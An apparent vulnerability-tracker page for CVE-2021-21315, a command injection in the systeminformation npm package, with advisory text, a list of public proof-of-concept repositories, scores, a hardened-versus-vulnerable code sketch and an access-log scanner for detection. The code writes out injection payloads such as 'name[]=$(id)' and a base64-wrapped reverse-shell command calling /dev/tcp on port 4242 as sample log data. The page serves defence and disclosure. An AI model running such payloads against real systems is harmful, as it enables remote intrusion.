CVE-2021-21315

HIGH KEV NUCLEI LAB

systeminformation < 5.3.1 - OS Command Injection via Service Parameter Handling


Exploitation Summary

CVE-2021-21315 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added January 18, 2022. EIP tracks 6 public exploits from researchers including ForbiddenProgrammer, alikarimi999, G01d3nW01f. A Nuclei detection template is also available.

AI-analyzed exploit summary: This repository contains a functional Proof of Concept (PoC) for CVE-2021-21315, demonstrating a command injection vulnerability in the 'systeminformation' npm package. The exploit leverages improper sanitization of array inputs to execute arbitrary commands on the target system.

Description

The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. The problem was fixed in version 5.3.1. As a workaround, if upgrading is not possible, check or sanitize the service parameters passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ...: allow only strings and reject any arrays. The library's sanitization of string parameters works as expected; the injection is reachable through array inputs, which bypass that sanitization.
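The following is an added example, not code from the systeminformation project or from any of the PoCs listed on this page. It models the bug class the advisory describes (a service parameter that is sanitized when it is a string but not when it is an array, then interpolated into a shell command) beside the advisory's workaround of accepting strings only. The function names, the `name`/`name[]` parameter and the `ps | grep` sink shape are assumptions for illustration, not the library's actual source.

```javascript
// Added example, not code from the systeminformation project or any PoC.
// Function names, the `name`/`name[]` parameter and the `ps | grep` sink
// shape are assumptions for illustration, not the library's actual source.

// Mimic qs-style query parsing (Express's default): `name[]=x` or a repeated
// key becomes an array. Node's own URLSearchParams does not do this, which is
// why "it came from a query string, so it is a string" is a false assumption.
function parseQuery(queryString) {
  const params = {};
  for (const [rawKey, value] of new URLSearchParams(queryString)) {
    const bracketed = rawKey.endsWith('[]');
    const key = bracketed ? rawKey.slice(0, -2) : rawKey;
    if (bracketed || key in params) {
      params[key] = [].concat(params[key] ?? [], value);
    } else {
      params[key] = value;
    }
  }
  return params;
}

// Pre-5.3.1 pattern in miniature: a string is scrubbed of shell
// metacharacters, but an array is joined and reaches the shell verbatim.
function buildServicesCommandVulnerable(srv) {
  let filter;
  if (Array.isArray(srv)) {
    filter = srv.join(' ');                                   // no sanitization
  } else {
    filter = String(srv).replace(/[^a-zA-Z0-9_.@,-]/g, '');  // string path is safe
  }
  return `ps -o pid,comm | grep -E "${filter}"`;
}

// Workaround from the advisory, plus an allowlist: only a string shaped like a
// service name is accepted; arrays, objects and metacharacters are rejected
// before any command is built.
const SERVICE_NAME_RE = /^[a-zA-Z0-9_.@-]{1,64}$/;

function buildServicesCommandHardened(srv) {
  if (typeof srv !== 'string') {
    const kind = Array.isArray(srv) ? 'array' : typeof srv;
    throw new TypeError(`service parameter must be a string, got ${kind}`);
  }
  if (!SERVICE_NAME_RE.test(srv)) {
    throw new Error('service parameter contains disallowed characters');
  }
  return `ps -o pid,comm | grep -E "${srv}"`;
}

// Walk one query string through both builders and return the outcomes so the
// difference is visible without executing anything.
function demo(queryString) {
  const { name } = parseQuery(queryString);
  let hardened;
  try {
    hardened = buildServicesCommandHardened(name);
  } catch (e) {
    hardened = `rejected: ${e.message}`;
  }
  return { param: name, vulnerable: buildServicesCommandVulnerable(name), hardened };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const q of ['name=nginx', 'name=$(id)', 'name[]=$(id)']) {
    console.log(q, demo(q));
  }
}
```

Running the three queries shows the point of the advisory: `name=$(id)` is scrubbed to `id` on the string path, while `name[]=$(id)` arrives as an array and the substitution survives into the command line; the hardened builder rejects the array on type alone and the metacharacters on the allowlist. Where the sink does not need a pipeline, passing arguments as an array to execFile rather than building a shell string removes the shell from the picture entirely.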

Exploits (6)

nomisec WORKING POC 159 stars
by ForbiddenProgrammer · remote
https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

This repository contains a functional Proof of Concept (PoC) for CVE-2021-21315, demonstrating a command injection vulnerability in the 'systeminformation' npm package. The exploit leverages improper sanitization of array inputs to execute arbitrary commands on the target system.

Classification: Working PoC (95%)
Attack type: RCE
Complexity: Trivial
Reliability: Reliable
Target: systeminformation npm package (versions before 5.3.1)
No auth needed
Prerequisites: Target system running a vulnerable version of the 'systeminformation' package · Network access to the target system
devstral-2 · analyzed Feb 18, 2026
nomisec WORKING POC 4 stars
by alikarimi999 · remote
https://github.com/alikarimi999/CVE-2021-21315

This repository contains a functional exploit for CVE-2021-21315, a command injection vulnerability in the 'systeminformation' npm package. The exploit crafts a malicious URL with a base64-encoded reverse shell payload and sends it to the target, triggering remote code execution.

Classification: Working PoC (95%)
Attack type: RCE
Complexity: Trivial
Reliability: Reliable
Target: systeminformation npm package (versions before 5.3.1)
No auth needed
Prerequisites: Target application using vulnerable 'systeminformation' package · Network access to the target
devstral-2 · analyzed Feb 18, 2026
nomisec WORKING POC 1 star
by G01d3nW01f · poc
https://github.com/G01d3nW01f/CVE-2021-21315

This repository contains a functional Rust-based exploit for CVE-2021-21315, which crafts a reverse shell payload encoded in base64 and URL-encoded to target a vulnerable API endpoint. The exploit sends the payload via HTTP request to achieve remote code execution.

Classification: Working PoC (95%)
Attack type: RCE
Complexity: Moderate
Reliability: Reliable
Target: systeminformation npm package (versions before 5.3.1), reached through an API endpoint that passes request input to it
No auth needed
Prerequisites: Network access to the target API endpoint · Listener set up to catch the reverse shell
devstral-2 · analyzed Feb 18, 2026
gitlab WORKING POC
by securitystuffbackup · poc
https://gitlab.com/securitystuffbackup/CVE-2021-21315-PoC

This repository contains a functional PoC for CVE-2021-21315, demonstrating a command injection vulnerability in the 'systeminformation' npm package. The exploit leverages improper sanitization of array inputs to execute arbitrary commands via the `si.services()` function.

Classification: Working PoC (95%)
Attack type: RCE
Complexity: Trivial
Reliability: Reliable
Target: systeminformation npm package (versions < 5.3.1)
No auth needed
Prerequisites: Node.js environment with vulnerable 'systeminformation' package installed
devstral-2 · analyzed Feb 23, 2026
nomisec WORKING POC
by xMohamed0 · poc
https://github.com/xMohamed0/CVE-2021-21315-POC

This repository contains a functional exploit PoC for CVE-2021-21315, targeting a command injection vulnerability in the Node.js npm package 'systeminformation'. The exploit sends a crafted HTTP request to execute a reverse shell via a command injection in the 'name[]' parameter.

Classification: Working PoC (95%)
Attack type: RCE
Complexity: Trivial
Reliability: Reliable
Target: Node.js npm package 'systeminformation' (versions before 5.3.1)
No auth needed
Prerequisites: Target application using vulnerable 'systeminformation' package · Network connectivity to the target · Listener set up on attacker's machine (port 4242)
devstral-2 · analyzed Feb 18, 2026
nomisec WORKING POC
by MazX0p · remote
https://github.com/MazX0p/CVE-2021-21315-exploit

The repository contains a functional Python exploit for CVE-2021-21315, targeting the 'systeminformation' npm package. It leverages command injection via a crafted API request to achieve remote code execution (RCE) by spawning a reverse shell.

Classification: Working PoC (95%)
Attack type: RCE
Complexity: Trivial
Reliability: Reliable
Target: systeminformation npm package (Node.js)
No auth needed
Prerequisites: Target with vulnerable 'systeminformation' package · Network connectivity to the target · Listener set up on attacker's machine (e.g., netcat on port 4242)
devstral-2 · analyzed Feb 18, 2026
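The PoCs above share one request shape: a bracketed array parameter (`name[]`) carrying shell substitution, in several cases an `echo <base64> | base64 -d | sh`-style wrapper around a reverse shell. The following is an added example, not code from any of those repositories, of pulling that shape out of web-server access logs and decoding the wrapped payload. The combined log format, the `/api/getServices` path, the client addresses and the reverse-shell command in the sample lines are all constructed for this example.

```javascript
// Added example, not code from any of the PoCs on this page. The log format,
// the /api/getServices path, the client addresses and the reverse-shell
// command below are constructed for illustration.

// Constructed payload of the kind the PoCs wrap in base64 (4242 is the
// listener port the prerequisites above mention; the address is made up).
const CONSTRUCTED_PAYLOAD = 'bash -i >& /dev/tcp/10.0.0.9/4242 0>&1';
const CONSTRUCTED_B64 = Buffer.from(CONSTRUCTED_PAYLOAD).toString('base64');

function logLine(client, ts, path, status, bytes) {
  return `${client} - - [${ts}] "GET ${path} HTTP/1.1" ${status} ${bytes}`;
}

// Constructed sample log: one benign request, one probe, one reverse-shell
// attempt, and one array-style parameter with a harmless value.
const SAMPLE_LOG = [
  logLine('10.0.0.5', '18/Feb/2026:10:00:01 +0000', '/api/getServices?name=nginx', 200, 512),
  logLine('10.0.0.9', '18/Feb/2026:10:00:07 +0000',
    '/api/getServices?name[]=' + encodeURIComponent('$(id)'), 200, 87),
  logLine('10.0.0.9', '18/Feb/2026:10:00:09 +0000',
    '/api/getServices?name[]=' + encodeURIComponent(`$(echo ${CONSTRUCTED_B64} | base64 -d | bash)`), 200, 87),
  logLine('10.0.0.7', '18/Feb/2026:10:00:12 +0000', '/api/getServices?name[]=sshd', 200, 310),
];

// Combined log format: client ident user [ts] "method path proto" status bytes
const ACCESS_LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\d+|-)$/;
// Command substitution and chaining characters that a service name never needs.
const SHELL_META_RE = /\$\(|`|[;|&]/;
// The echo|base64 -d wrapper used to smuggle a longer command through one parameter.
const B64_WRAPPER_RE = /echo\s+([A-Za-z0-9+/]+={0,2})\s*\|\s*base64\s+(?:-d|--decode)/;

// Inspect one request path; returns findings for array-style parameters that
// carry shell metacharacters, or null when nothing matches.
function analyzeRequestPath(path) {
  const q = path.indexOf('?');
  if (q < 0) return null;
  const findings = [];
  for (const [key, value] of new URLSearchParams(path.slice(q + 1))) {
    if (!key.endsWith('[]') || !SHELL_META_RE.test(value)) continue;
    const wrapper = B64_WRAPPER_RE.exec(value);
    findings.push({
      param: key,
      value,
      decodedPayload: wrapper ? Buffer.from(wrapper[1], 'base64').toString('utf8') : null,
    });
  }
  return findings.length ? findings : null;
}

// Run the check over combined-format lines; lines that do not parse are skipped.
function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const m = ACCESS_LOG_RE.exec(line);
    if (!m) continue;
    const [, client, ts, method, path, status] = m;
    const findings = analyzeRequestPath(path);
    if (findings) hits.push({ client, ts, method, path, status: Number(status), findings });
  }
  return hits;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanAccessLog(SAMPLE_LOG), null, 2));
}
```

The array-style key is the discriminating feature: `name=$(id)` is scrubbed by the library's string path, so it is noise, while `name[]=` with the same content is the bypass described in the advisory. Decoding the base64 wrapper turns a log hit into the actual callback address and port, which is what an incident responder needs to block and to hunt for the matching outbound connection.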

Nuclei Templates (1)

Node.JS System Information Library <5.3.1 - Remote Command Injection
HIGH · by pikpikcu

Scores

CVSS v3 7.1
EPSS 0.9396
EPSS Percentile 99.9%
Attack Vector LOCAL
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

CISA SSVC

Vulnrichment
Exploitation active
Automatable no
Technical Impact partial

Details

CISA KEV 2022-01-18
VulnCheck KEV 2021-06-01
InTheWild.io 2021-07-01
ENISA EUVD EUVD-2021-0527
CWE
CWE-78
Status published
Products (3)
apache/cordova 10.0.0
npm/systeminformation 0 - 5.3.1 (npm)
systeminformation/systeminformation < 5.3.1
Published Feb 16, 2021
KEV Added Jan 18, 2022
Tracked Since Feb 18, 2026